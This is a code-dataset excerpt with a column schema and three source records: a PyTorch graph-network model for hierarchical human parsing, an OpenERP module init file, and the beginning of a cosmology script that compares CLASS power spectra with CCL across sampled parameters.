| Column | dtype | Range / values |
|---|---|---|
| blob_id | stringlengths | 40–40 |
| directory_id | stringlengths | 40–40 |
| path | stringlengths | 3–616 |
| content_id | stringlengths | 40–40 |
| detected_licenses | sequencelengths | 0–112 |
| license_type | stringclasses | 2 values |
| repo_name | stringlengths | 5–115 |
| snapshot_id | stringlengths | 40–40 |
| revision_id | stringlengths | 40–40 |
| branch_name | stringclasses | 777 values |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 (nullable ⌀) | 4.92k – 681M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | stringclasses | 22 values |
| gha_event_created_at | timestamp[us] (nullable ⌀) | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] (nullable ⌀) | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 |
| gha_language | stringclasses | 149 values |
| src_encoding | stringclasses | 26 values |
| language | stringclasses | 1 value |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 – 10.2M |
| extension | stringclasses | 188 values |
| content | stringlengths | 3 – 10.2M |
| authors | sequencelengths | 1–1 |
| author_id | stringlengths | 1–132 |
c072c513deba039b750e3b8889e19fe875c1bdf6 | 53fca3fa4662a5d04e99445c3baeaaa4169083a1 | /network/gnn08551_final_iter3.py | 0d34db379927cd20545608c0f7c8d3cc6de81609 | [] | no_license | yougoforward/Iter_ParseNet | 223b99aa5eef70b83f2fa5493c26549266a11fe9 | 39367c3332b076678105489ce4a5cf8f250491e5 | refs/heads/master | 2021-07-12T20:49:19.866085 | 2020-09-06T12:32:35 | 2020-09-06T12:32:35 | 200,991,268 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,649 | py | import functools
import torch
import torch.nn as nn
from torch.nn import functional as F
from inplace_abn.bn import InPlaceABNSync
from modules.com_mod import Bottleneck, ResGridNet, SEModule
from modules.parse_mod import MagicModule
from modules.senet import se_resnext50_32x4d, se_resnet101, senet154
BatchNorm2d = functools.partial(InPlaceABNSync, activation='none')
from modules.convGRU import ConvGRU
from modules.dcn import DFConv2d
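# Composition: aggregates child-node features into their parent node. A shared 1x1-conv
# attention map is computed from the concatenated child features; each child is gated by
# it, concatenated with the parent feature, projected back to hidden_dim, and the
# per-child messages are summed.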
class Composition(nn.Module):
def __init__(self, hidden_dim, parts=2):
super(Composition, self).__init__()
self.conv_ch = nn.Sequential(
nn.Conv2d(2 * hidden_dim, 2 * hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(2 * hidden_dim), nn.ReLU(inplace=False),
nn.Conv2d(2 * hidden_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False)
)
self.com_att = nn.Sequential(
nn.Conv2d(parts * hidden_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False),
nn.Conv2d(hidden_dim, 1, kernel_size=1, padding=0, stride=1, bias=True),
)
def forward(self, xh, xp_list):
com_att = self.com_att(torch.cat(xp_list, dim=1))
xph_message = sum([self.conv_ch(torch.cat([xh, xp * torch.sigmoid(com_att)], dim=1)) for xp in xp_list])
return xph_message, com_att
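# Decomposition: splits a parent-node feature into per-child messages. A softmax over
# (parts + 1) channels (children plus background) decides how much of the parent feature
# each child receives before the concat + 1x1-conv projection.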
class Decomposition(nn.Module):
def __init__(self, hidden_dim=10, parts=2):
super(Decomposition, self).__init__()
self.conv_fh = nn.Sequential(
nn.Conv2d(2 * hidden_dim, 2 * hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(2 * hidden_dim), nn.ReLU(inplace=False),
nn.Conv2d(2 * hidden_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False)
)
self.decomp_att = Decomp_att(hidden_dim=hidden_dim, parts=parts)
def forward(self, xf, xh_list):
decomp_att_list, maps = self.decomp_att(xf, xh_list)
decomp_fh_list = [self.conv_fh(torch.cat([xf * decomp_att_list[i+1], xh_list[i]], dim=1)) for i in
range(len(xh_list))]
return decomp_fh_list, decomp_att_list, maps
class Decomp_att(nn.Module):
def __init__(self, hidden_dim=10, parts=2):
super(Decomp_att, self).__init__()
self.conv_fh = nn.Conv2d(hidden_dim, parts+1, kernel_size=1, padding=0, stride=1, bias=True)
self.softmax= nn.Softmax(dim=1)
def forward(self, xf, xh_list):
decomp_map = self.conv_fh(xf)
decomp_att = self.softmax(decomp_map)
decomp_att_list = list(torch.split(decomp_att, 1, dim=1))
return decomp_att_list, decomp_map
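# Builds, for every cell of an H x W feature map, an 8-dim spatial feature: the cell's
# corner coordinates (xmin, ymin, xmax, ymax) and centre (xctr, yctr) normalised to
# [-1, 1], plus the cell size (1/W, 1/H).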
def generate_spatial_batch(featmap_H, featmap_W):
import numpy as np
spatial_batch_val = np.zeros((1, featmap_H, featmap_W, 8), dtype=np.float32)
for h in range(featmap_H):
for w in range(featmap_W):
xmin = w / featmap_W * 2 - 1
xmax = (w + 1) / featmap_W * 2 - 1
xctr = (xmin + xmax) / 2
ymin = h / featmap_H * 2 - 1
ymax = (h + 1) / featmap_H * 2 - 1
yctr = (ymin + ymax) / 2
spatial_batch_val[:, h, w, :] = \
[xmin, ymin, xmax, ymax, xctr, yctr, 1 / featmap_W, 1 / featmap_H]
return spatial_batch_val
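# Dep_Context: non-local dependency context. Max-pooled image features (query) and a
# part-node map (key), both augmented with the 8-dim spatial encoding above, form an
# attention matrix; the part features are re-weighted by it, projected and upsampled
# back to the input resolution.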
class Dep_Context(nn.Module):
def __init__(self, in_dim=256, hidden_dim=10):
super(Dep_Context, self).__init__()
self.in_dim = in_dim
self.hidden_dim = hidden_dim
self.W = nn.Parameter(torch.ones(in_dim, hidden_dim))
self.sigmoid = nn.Sigmoid()
self.coord_fea = torch.from_numpy(generate_spatial_batch(30, 30))
self.maxpool = nn.AdaptiveMaxPool2d(1)
self.project = nn.Sequential(nn.Conv2d(hidden_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False)
)
self.img_conv = nn.Sequential(nn.Conv2d(in_dim + 8, in_dim, kernel_size=1, stride=1, padding=0, bias=True))
self.node_conv = nn.Sequential(nn.Conv2d(hidden_dim + 8, hidden_dim, kernel_size=1, stride=1, padding=0, bias=True))
self.pool = nn.MaxPool2d(kernel_size=(2,2))
def forward(self, p_fea, hu):
n, c, h, w = p_fea.size()
query = self.pool(p_fea)
key = self.pool(hu)
n, c, hp, wp = query.size()
# coord_fea = torch.from_numpy(generate_spatial_batch(n,h,w)).to(p_fea.device).view(n,-1,8) #n,hw,8
coord_fea = self.coord_fea.to(p_fea.device).repeat((n, 1, 1, 1)).permute(0, 3, 1, 2)
project1 = torch.matmul(self.img_conv(torch.cat([query, coord_fea], dim=1)).view(n, -1, hp*wp).permute(0,2,1), self.W) # n,hw,hidden
energy = torch.matmul(project1, self.node_conv(torch.cat([key, coord_fea], dim=1)).view(n, -1, hp*wp)) # n,hw,hw
attention = torch.softmax(energy, dim=-1)
co_context = torch.bmm(key.view(n, -1, hp*wp), attention.permute(0, 2, 1)).view(n, -1, hp, wp)
co_context = self.project(co_context)
co_context =F.interpolate(co_context, (h, w), mode="bilinear", align_corners=True)
return co_context
class Contexture(nn.Module):
def __init__(self, in_dim=256, hidden_dim=10, parts=6, part_list_list=None):
super(Contexture, self).__init__()
self.hidden_dim =hidden_dim
self.F_cont = nn.ModuleList(
[Dep_Context(in_dim, hidden_dim) for i in range(len(part_list_list))])
self.dp_cont = nn.ModuleList(
[nn.Conv2d(in_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=True)
for i in range(len(part_list_list))])
self.parts = parts
self.att_list = nn.ModuleList([nn.Conv2d(hidden_dim, len(part_list_list[i])+ 1, kernel_size=1, padding=0, stride=1, bias=True)
for i in range(len(part_list_list))])
self.context_att_list = nn.ModuleList([nn.Sequential(
nn.Conv2d(hidden_dim, 2, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
) for i in range(len(part_list_list))])
self.softmax = nn.Softmax(dim=1)
def forward(self, xp_list, p_fea, part_list_list):
F_dep_list =[self.F_cont[i](p_fea, xp_list[i]) for i in range(len(xp_list))]
att_list = [self.att_list[i](self.dp_cont[i](p_fea)) for i in range(len(xp_list))]
# context_att_list = [self.context_att_list[i](F_dep_list[i]) for i in range(len(xp_list))]
att_list_list = [list(torch.split(self.softmax(att_list[i]), 1, dim=1)) for i in range(len(xp_list))]
return F_dep_list, att_list_list, att_list
class Part_Dependency(nn.Module):
def __init__(self, in_dim=256, hidden_dim=10):
super(Part_Dependency, self).__init__()
self.R_dep = nn.Sequential(
nn.Conv2d(2*hidden_dim, 2 * hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(2 * hidden_dim), nn.ReLU(inplace=False),
nn.Conv2d(2 * hidden_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False)
)
def forward(self, F_dep_hu, hv):
huv = self.R_dep(torch.cat([F_dep_hu, hv], dim=1))
return huv
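# conv_Update: fuses an aggregated message into a node's hidden state with a one-step
# 1x1 ConvGRU (the message is the input, the current node feature the previous hidden state).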
class conv_Update(nn.Module):
def __init__(self, hidden_dim=10):
super(conv_Update, self).__init__()
self.hidden_dim = hidden_dim
dtype = torch.cuda.FloatTensor
self.update = ConvGRU(input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(1, 1),
num_layers=1,
dtype=dtype,
batch_first=True,
bias=True,
return_all_layers=False)
def forward(self, x, message):
_, out = self.update(message.unsqueeze(1), [x])
return out[0][0]
class DecoderModule(nn.Module):
def __init__(self, num_classes):
super(DecoderModule, self).__init__()
self.conv0 = nn.Sequential(nn.Conv2d(512, 512, kernel_size=3, padding=1, dilation=1, bias=False),
BatchNorm2d(512), nn.ReLU(inplace=False))
self.conv1 = nn.Sequential(nn.Conv2d(512, 256, kernel_size=3, padding=1, dilation=1, bias=False),
BatchNorm2d(256), nn.ReLU(inplace=False))
# self.conv2 = nn.Sequential(nn.Conv2d(256, 48, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),
# BatchNorm2d(48), nn.ReLU(inplace=False))
#
# self.conv3 = nn.Sequential(nn.Conv2d(304, 256, kernel_size=1, padding=0, dilation=1, bias=False),
# BatchNorm2d(256), nn.ReLU(inplace=False),
# nn.Conv2d(256, 256, kernel_size=1, padding=0, dilation=1, bias=False),
# BatchNorm2d(256), nn.ReLU(inplace=False))
# self.conv4 = nn.Conv2d(256, num_classes, kernel_size=1, padding=0, dilation=1, bias=True)
self.alpha = nn.Parameter(torch.ones(1))
def forward(self, xt, xm, xl):
_, _, h, w = xm.size()
xt = self.conv0(F.interpolate(xt, size=(h, w), mode='bilinear', align_corners=True) + self.alpha * xm)
_, _, th, tw = xl.size()
xt_fea = self.conv1(xt)
# xt = F.interpolate(xt_fea, size=(th, tw), mode='bilinear', align_corners=True)
# xl = self.conv2(xl)
# x = torch.cat([xt, xl], dim=1)
# x_fea = self.conv3(x)
# x_seg = self.conv4(x_fea)
return xt_fea
class AlphaHBDecoder(nn.Module):
def __init__(self, hbody_cls):
super(AlphaHBDecoder, self).__init__()
self.conv1 = nn.Sequential(nn.Conv2d(512, 256, kernel_size=3, padding=1, stride=1, bias=False),
BatchNorm2d(256), nn.ReLU(inplace=False),
nn.Conv2d(256, 256, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(256), nn.ReLU(inplace=False), SEModule(256, reduction=16))
self.alpha_hb = nn.Parameter(torch.ones(1))
def forward(self, x, skip):
_, _, h, w = skip.size()
xup = F.interpolate(x, size=(h, w), mode='bilinear', align_corners=True)
xfuse = xup + self.alpha_hb * skip
xfuse = self.conv1(xfuse)
return xfuse
class AlphaFBDecoder(nn.Module):
def __init__(self, fbody_cls):
super(AlphaFBDecoder, self).__init__()
self.conv1 = nn.Sequential(nn.Conv2d(512, 256, kernel_size=3, padding=1, stride=1, bias=False),
BatchNorm2d(256), nn.ReLU(inplace=False),
nn.Conv2d(256, 256, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(256), nn.ReLU(inplace=False), SEModule(256, reduction=16))
self.alpha_fb = nn.Parameter(torch.ones(1))
def forward(self, x, skip):
_, _, h, w = skip.size()
xup = F.interpolate(x, size=(h, w), mode='bilinear', align_corners=True)
xfuse = xup + self.alpha_fb * skip
xfuse = self.conv1(xfuse)
return xfuse
class Full_Graph(nn.Module):
def __init__(self, in_dim=256, hidden_dim=10, cls_p=7, cls_h=3, cls_f=2):
super(Full_Graph, self).__init__()
self.hidden = hidden_dim
self.comp_h = Composition(hidden_dim, parts=2)
self.conv_Update = conv_Update(hidden_dim)
def forward(self, xf, xh_list, xp_list):
comp_h, com_map = self.comp_h(xf, xh_list)
xf = self.conv_Update(xf, comp_h)
return xf, com_map
class Half_Graph(nn.Module):
def __init__(self, upper_part_list=[1, 2, 3, 4], lower_part_list=[5, 6], in_dim=256, hidden_dim=10, cls_p=7,
cls_h=3, cls_f=2):
super(Half_Graph, self).__init__()
self.cls_h = cls_h
self.upper_part_list = upper_part_list
self.lower_part_list = lower_part_list
self.upper_parts_len = len(upper_part_list)
self.lower_parts_len = len(lower_part_list)
self.hidden = hidden_dim
self.decomp_fh_list = Decomposition(hidden_dim, parts=2)
self.comp_u = Composition(hidden_dim, parts=len(upper_part_list))
self.comp_l = Composition(hidden_dim, parts=len(lower_part_list))
self.update_u = conv_Update(hidden_dim)
self.update_l = conv_Update(hidden_dim)
def forward(self, xf, xh_list, xp_list, h_fea):
decomp_list, decomp_att_list, decomp_att_map = self.decomp_fh_list(xf, xh_list)
# upper half
upper_parts = []
for part in self.upper_part_list:
upper_parts.append(xp_list[part - 1])
comp_u, com_u_map = self.comp_u(xh_list[0], upper_parts)
message_u = decomp_list[0] + comp_u
xh_u = self.update_u(xh_list[0], message_u)
# lower half
lower_parts = []
for part in self.lower_part_list:
lower_parts.append(xp_list[part - 1])
comp_l, com_l_map = self.comp_l(xh_list[1], lower_parts)
message_l = decomp_list[1] + comp_l
xh_l = self.update_l(xh_list[1], message_l)
xh_list_new = [xh_u, xh_l]
return xh_list_new, decomp_att_map, com_u_map, com_l_map
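# Part_Graph: message passing among the fine-grained part nodes. The adjacency matrix is
# unrolled into directed edges; each part receives a decomposition message from its half
# (upper or lower) plus dependency messages from its graph neighbours, and is then
# updated with a ConvGRU.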
class Part_Graph(nn.Module):
def __init__(self, adj_matrix, upper_part_list=[1, 2, 3, 4], lower_part_list=[5, 6], in_dim=256, hidden_dim=10,
cls_p=7, cls_h=3, cls_f=2):
super(Part_Graph, self).__init__()
self.cls_p = cls_p
self.upper_part_list = upper_part_list
self.lower_part_list = lower_part_list
self.edge_index = torch.nonzero(adj_matrix)
self.edge_index_num = self.edge_index.shape[0]
self.part_list_list = [[] for i in range(self.cls_p - 1)]
for i in range(self.edge_index_num):
self.part_list_list[self.edge_index[i, 1]].append(self.edge_index[i, 0])
self.F_dep_list = Contexture(in_dim=in_dim, hidden_dim=hidden_dim, parts=self.cls_p - 1, part_list_list=self.part_list_list)
self.decomp_hpu_list = Decomposition(hidden_dim, parts=len(upper_part_list))
self.decomp_hpl_list = Decomposition(hidden_dim, parts=len(lower_part_list))
self.part_dp = nn.ModuleList([Part_Dependency(in_dim, hidden_dim) for i in range(self.edge_index_num)])
self.node_update_list = nn.ModuleList([conv_Update(hidden_dim) for i in range(self.cls_p - 1)])
def forward(self, xf, xh_list, xp_list, xp):
# upper half
upper_parts = []
for part in self.upper_part_list:
upper_parts.append(xp_list[part - 1])
# lower half
lower_parts = []
for part in self.lower_part_list:
lower_parts.append(xp_list[part - 1])
decomp_pu_list, decomp_pu_att_list, decomp_pu_att_map = self.decomp_hpu_list(xh_list[0], upper_parts)
decomp_pl_list, decomp_pl_att_list, decomp_pl_att_map = self.decomp_hpl_list(xh_list[1], lower_parts)
#dp
F_dep_list, att_list_list, Fdep_att_list = self.F_dep_list(xp_list, xp, self.part_list_list)
xpp_list_list = [[] for i in range(self.cls_p - 1)]
for i in range(self.edge_index_num):
xpp_list_list[self.edge_index[i, 1]].append(
self.part_dp[i](att_list_list[self.edge_index[i, 0]][
1 + self.part_list_list[self.edge_index[i, 0]].index(self.edge_index[i, 1])] *
F_dep_list[self.edge_index[i, 0]], xp_list[self.edge_index[i, 1]]))
xp_list_new = []
for i in range(self.cls_p - 1):
if i + 1 in self.upper_part_list:
message = decomp_pu_list[self.upper_part_list.index(i + 1)] + sum(xpp_list_list[i])
elif i + 1 in self.lower_part_list:
message = decomp_pl_list[self.lower_part_list.index(i + 1)] + sum(xpp_list_list[i])
xp_list_new.append(self.node_update_list[i](xp_list[i], message))
return xp_list_new, decomp_pu_att_map, decomp_pl_att_map, Fdep_att_list
class GNN(nn.Module):
def __init__(self, adj_matrix, upper_half_node=[1, 2, 3, 4], lower_half_node=[5, 6], in_dim=256, hidden_dim=10,
cls_p=7, cls_h=3, cls_f=2):
super(GNN, self).__init__()
self.cp = cls_p
self.ch = cls_h
self.cf = cls_f
self.ch_in = in_dim
self.hidden = hidden_dim
self.upper_half_node = upper_half_node
self.upper_node_len = len(self.upper_half_node)
self.lower_half_node = lower_half_node
self.lower_node_len = len(self.lower_half_node)
self.full_infer = Full_Graph(in_dim, hidden_dim, cls_p, cls_h, cls_f)
self.half_infer = Half_Graph(self.upper_half_node, self.lower_half_node, in_dim, hidden_dim, cls_p, cls_h,
cls_f)
self.part_infer = Part_Graph(adj_matrix, self.upper_half_node, self.lower_half_node, in_dim, hidden_dim, cls_p,
cls_h, cls_f)
def forward(self, xp_list, xh_list, xf, p_fea, h_fea):
# for full body node
xf_new, com_map = self.full_infer(xf, xh_list, xp_list)
# for half body node
xh_list_new, decomp_fh_att_map, com_u_map, com_l_map = self.half_infer(xf, xh_list, xp_list, h_fea)
# for part node
xp_list_new, decomp_up_att_map, decomp_lp_att_map, Fdep_att_list = self.part_infer(xf, xh_list, xp_list, p_fea)
return xp_list_new, xh_list_new, xf_new, decomp_fh_att_map, decomp_up_att_map, decomp_lp_att_map, com_map, com_u_map, com_l_map, Fdep_att_list
class GNN_infer(nn.Module):
def __init__(self, adj_matrix, upper_half_node=[1, 2, 3, 4], lower_half_node=[5, 6], in_dim=256, hidden_dim=10,
cls_p=7, cls_h=3, cls_f=2):
super(GNN_infer, self).__init__()
self.cls_p = cls_p
self.cls_h = cls_h
self.cls_f = cls_f
self.in_dim = in_dim
self.hidden_dim = hidden_dim
# feature transform
self.p_conv = nn.Sequential(
nn.Conv2d(in_dim, hidden_dim * (cls_p - 1), kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim * (cls_p - 1)), nn.ReLU(inplace=False))
self.h_conv = nn.Sequential(
nn.Conv2d(in_dim, hidden_dim * (cls_h - 1), kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim * (cls_h - 1)), nn.ReLU(inplace=False))
self.f_conv = nn.Sequential(
nn.Conv2d(in_dim, hidden_dim * (cls_f - 1), kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim * (cls_f - 1)), nn.ReLU(inplace=False))
self.bg_conv = nn.Sequential(
nn.Conv2d(3 * in_dim, hidden_dim, kernel_size=1, padding=0, stride=1,
bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False))
# gnn infer
self.gnn = GNN(adj_matrix, upper_half_node, lower_half_node, self.in_dim, self.hidden_dim, self.cls_p,
self.cls_h, self.cls_f)
# node supervision
self.p_cls = nn.Conv2d(hidden_dim * (cls_p-1), (cls_p -1),
kernel_size=1, padding=0, stride=1, bias=True,
groups=(cls_p-1))
self.h_cls = nn.Conv2d(hidden_dim * (cls_h-1), (cls_h -1),
kernel_size=1, padding=0, stride=1, bias=True,
groups=(cls_h-1))
self.f_cls = nn.Conv2d(hidden_dim * (cls_f-1), (cls_f -1),
kernel_size=1, padding=0, stride=1, bias=True,
groups=(cls_f-1))
self.bg_cls = nn.Conv2d(hidden_dim, 1,
kernel_size=1, padding=0, stride=1, bias=True,
groups=1)
self.softmax = nn.Softmax(dim=1)
self.final_cls = Final_classifer(in_dim, hidden_dim, cls_p, cls_h, cls_f)
def forward(self, xp, xh, xf, xl):
# _, _, th, tw = xp.size()
# _, _, h, w = xh.size()
#
# xh = F.interpolate(xh, (th, tw), mode='bilinear', align_corners=True)
# xf = F.interpolate(xf, (th, tw), mode='bilinear', align_corners=True)
# feature transform
f_node = self.f_conv(xf)
p_conv = self.p_conv(xp)
p_node_list = list(torch.split(p_conv, self.hidden_dim, dim=1))
h_conv = self.h_conv(xh)
h_node_list = list(torch.split(h_conv, self.hidden_dim, dim=1))
bg_node = self.bg_conv(torch.cat([xp, xh, xf], dim=1))
# node supervision
bg_cls = self.bg_cls(bg_node)
p_cls = self.p_cls(p_conv)
h_cls = self.h_cls(h_conv)
f_cls = self.f_cls(f_node)
f_seg = torch.cat([bg_cls, f_cls], dim=1)
h_seg = torch.cat([bg_cls, h_cls], dim=1)
p_seg = torch.cat([bg_cls, p_cls], dim=1)
# output
p_seg = [p_seg]
h_seg = [h_seg]
f_seg = [f_seg]
decomp_fh_att_map = []
decomp_up_att_map = []
decomp_lp_att_map = []
com_map = []
com_u_map = []
com_l_map = []
Fdep_att_list = []
# input
p_node_list = [p_node_list]
h_node_list = [h_node_list]
f_node = [f_node]
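        # Three rounds of message passing over the full / half / part hierarchy; the node
        # states and the segmentation logits of every iteration are all kept and returned.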
for iter in range(3):
p_fea_list_new, h_fea_list_new, f_fea_new, decomp_fh_att_map_new, decomp_up_att_map_new, \
decomp_lp_att_map_new, com_map_new, com_u_map_new, com_l_map_new, Fdep_att_list_new = self.gnn(
p_node_list[iter], h_node_list[iter], f_node[iter], xp, xh)
p_node_list.append(p_fea_list_new)
h_node_list.append(h_fea_list_new)
f_node.append(f_fea_new)
decomp_fh_att_map.append(decomp_fh_att_map_new)
decomp_up_att_map.append(decomp_up_att_map_new)
decomp_lp_att_map.append(decomp_lp_att_map_new)
com_map.append(com_map_new)
com_u_map.append(com_u_map_new)
com_l_map.append(com_l_map_new)
Fdep_att_list.append(Fdep_att_list_new)
# node supervision
p_cls_new = self.p_cls(torch.cat(p_fea_list_new, dim=1))
h_cls_new = self.h_cls(torch.cat(h_fea_list_new, dim=1))
f_cls_new = self.f_cls(f_fea_new)
f_seg_new = torch.cat([bg_cls, f_cls_new], dim=1)
h_seg_new = torch.cat([bg_cls, h_cls_new], dim=1)
p_seg_new = torch.cat([bg_cls, p_cls_new], dim=1)
p_seg.append(p_seg_new)
h_seg.append(h_seg_new)
f_seg.append(f_seg_new)
xphf_infer = torch.cat([bg_node] + p_fea_list_new, dim=1)
p_seg_final = self.final_cls(xphf_infer, xp, xh, xf, xl)
p_seg.append(p_seg_final)
return p_seg, h_seg, f_seg, decomp_fh_att_map, decomp_up_att_map, decomp_lp_att_map, com_map, com_u_map, com_l_map, Fdep_att_list
class Final_classifer(nn.Module):
def __init__(self, in_dim=256, hidden_dim=20, cls_p=7, cls_h=3, cls_f=2):
super(Final_classifer, self).__init__()
self.cp = cls_p
self.ch = cls_h
self.cf = cls_f
self.ch_in = in_dim
# classifier
self.conv0 = nn.Sequential(nn.Conv2d(in_dim + cls_p*hidden_dim, in_dim, kernel_size=3, padding=1, dilation=1, bias=False),
BatchNorm2d(in_dim), nn.ReLU(inplace=False),
nn.Conv2d(in_dim, in_dim, kernel_size=3, padding=1, dilation=1, bias=False),
BatchNorm2d(in_dim), nn.ReLU(inplace=False)
)
self.conv2 = nn.Sequential(nn.Conv2d(in_dim, 48, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),
BatchNorm2d(48), nn.ReLU(inplace=False))
self.conv3 = nn.Sequential(nn.Conv2d(in_dim + 48, in_dim, kernel_size=1, padding=0, dilation=1, bias=False),
BatchNorm2d(in_dim), nn.ReLU(inplace=False),
nn.Conv2d(in_dim, in_dim, kernel_size=1, padding=0, dilation=1, bias=False),
BatchNorm2d(in_dim)
)
self.relu = nn.ReLU(inplace=False)
self.p_cls = nn.Conv2d(in_dim, cls_p, kernel_size=1, padding=0, dilation=1, bias=True)
def forward(self, xphf, xp, xh, xf, xl):
# classifier
_, _, th, tw = xl.size()
xt = F.interpolate(self.conv0(torch.cat([xphf, xp], dim=1)), size=(th, tw), mode='bilinear', align_corners=True)
xl = self.conv2(xl)
x = torch.cat([xt, xl], dim=1)
x_fea = self.relu(self.conv3(x)+xt)
xp_seg = self.p_cls(x_fea)
return xp_seg
class Decoder(nn.Module):
def __init__(self, num_classes=7, hbody_cls=3, fbody_cls=2):
super(Decoder, self).__init__()
self.layer5 = MagicModule(2048, 512, 1)
self.layer6 = DecoderModule(num_classes)
self.layerh = AlphaHBDecoder(hbody_cls)
self.layerf = AlphaFBDecoder(fbody_cls)
#
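        # Symmetric 6x6 adjacency over part classes 1-6 (background excluded): edges
        # 1-2, 2-3, 3-4, 2-5 and 5-6 define which part nodes exchange dependency messages.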
self.adj_matrix = torch.tensor(
[[0, 1, 0, 0, 0, 0], [1, 0, 1, 0, 1, 0], [0, 1, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0], [0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 0]], requires_grad=False)
self.gnn_infer = GNN_infer(adj_matrix=self.adj_matrix, upper_half_node=[1, 2, 3, 4], lower_half_node=[5, 6],
in_dim=256, hidden_dim=10, cls_p=7, cls_h=3, cls_f=2)
#
self.layer_dsn = nn.Sequential(nn.Conv2d(1024, 512, kernel_size=3, stride=1, padding=1),
BatchNorm2d(512), nn.ReLU(inplace=False),
nn.Conv2d(512, num_classes, kernel_size=1, stride=1, padding=0, bias=True))
def forward(self, x):
x_dsn = self.layer_dsn(x[-2])
seg = self.layer5(x[-1])
# direct infer
x_fea = self.layer6(seg, x[1], x[0])
alpha_hb_fea = self.layerh(seg, x[1])
alpha_fb_fea = self.layerf(seg, x[1])
# gnn infer
p_seg, h_seg, f_seg, decomp_fh_att_map, decomp_up_att_map, decomp_lp_att_map, com_map, \
com_u_map, com_l_map, Fdep_att_list = self.gnn_infer(x_fea, alpha_hb_fea, alpha_fb_fea, x[0])
return p_seg, h_seg, f_seg, decomp_fh_att_map, decomp_up_att_map, decomp_lp_att_map, com_map, com_u_map, com_l_map, Fdep_att_list, x_dsn
class OCNet(nn.Module):
def __init__(self, block, layers, num_classes):
super(OCNet, self).__init__()
self.encoder = ResGridNet(block, layers)
self.decoder = Decoder(num_classes=num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight.data)
elif isinstance(m, InPlaceABNSync):
m.weight.data.fill_(1)
m.bias.data.zero_()
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def get_model(num_classes=20):
# model = OCNet(Bottleneck, [3, 4, 6, 3], num_classes) #50
model = OCNet(Bottleneck, [3, 4, 23, 3], num_classes) # 101
# model = OCNet(Bottleneck, [3, 8, 36, 3], num_classes) #152
return model
| [
"[email protected]"
] | |
783dd1d568ddd1d977bf4a922d2fa5e961d99b73 | 12977c4d2eae4bfd3b7112814a7e63c506e7bbbe | /ad_purchase_compare/__init__.py | be87bd2c85658bae154f92cdd8ca4bdaa35cc039 | [] | no_license | aryaadiputra/addons60_ptgbu_2013 | 211f3ab9fc74cc3e3f4df770b6ada65d24b83977 | b5cf28bdbb347df4c39ffe3ca32355bd2206077b | refs/heads/master | 2020-04-06T04:11:37.667486 | 2016-11-25T03:27:54 | 2016-11-25T03:27:54 | 58,649,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 64 | py | import purchase
import purchase_requisition_partner
import stock | [
"[email protected]"
] | |
179a046688ec86cdc0a1838723c43484ef4af058 | 6f57761c60582c546423a2a08c769f18236fd153 | /benchmarks/data/codes/run_pk_param_space.py | da414557736a952df54584c6f3e3878402cbf9b5 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"BSD-2-Clause"
] | permissive | LSSTDESC/CCL | 30644922fead0b017c1056e628bec23cf6bc4dfb | 29d46978445678d86a4bee485cb29d30246ff64a | refs/heads/master | 2023-09-03T17:03:17.012019 | 2023-08-08T11:01:33 | 2023-08-08T11:01:33 | 57,389,367 | 118 | 68 | BSD-3-Clause | 2023-08-30T13:25:25 | 2016-04-29T14:08:38 | C | UTF-8 | Python | false | false | 3,398 | py | #!/usr/bin/env python
"""
Generate a set of CLASS power spectra across a set of sample points in
cosmological parameter space, and compare with CCL.
"""
from param_space import *
import os, sys
# Need to specify directory containing 'class' executable
CLASS_ROOT = None
if len(sys.argv) > 1: CLASS_ROOT = sys.argv[1]
assert CLASS_ROOT is not None, \
"Must specify CLASS_ROOT (as argument or in source file)."
PREFIX = "std" # Prefix to use for this run
NSAMP = 100 # No. of sample points in parameter space
SEED = 10 # Random seed to use for sampling
ZVALS = np.arange(0., 3., 0.5) # Redshifts to evaluate P(k) at
# Define parameter space to sample over
param_dict = {
'h': (0.55, 0.8),
'Omega_cdm': (0.15, 0.35),
'Omega_b': (0.018, 0.052),
'A_s': (1.5e-9, 2.5e-9),
'n_s': (0.94, 0.98)
}
# Check that expected output data directories exist
class_datadir = "%s/data/class" % os.path.abspath(".")
ccl_datadir = "%s/data/ccl" % os.path.abspath(".")
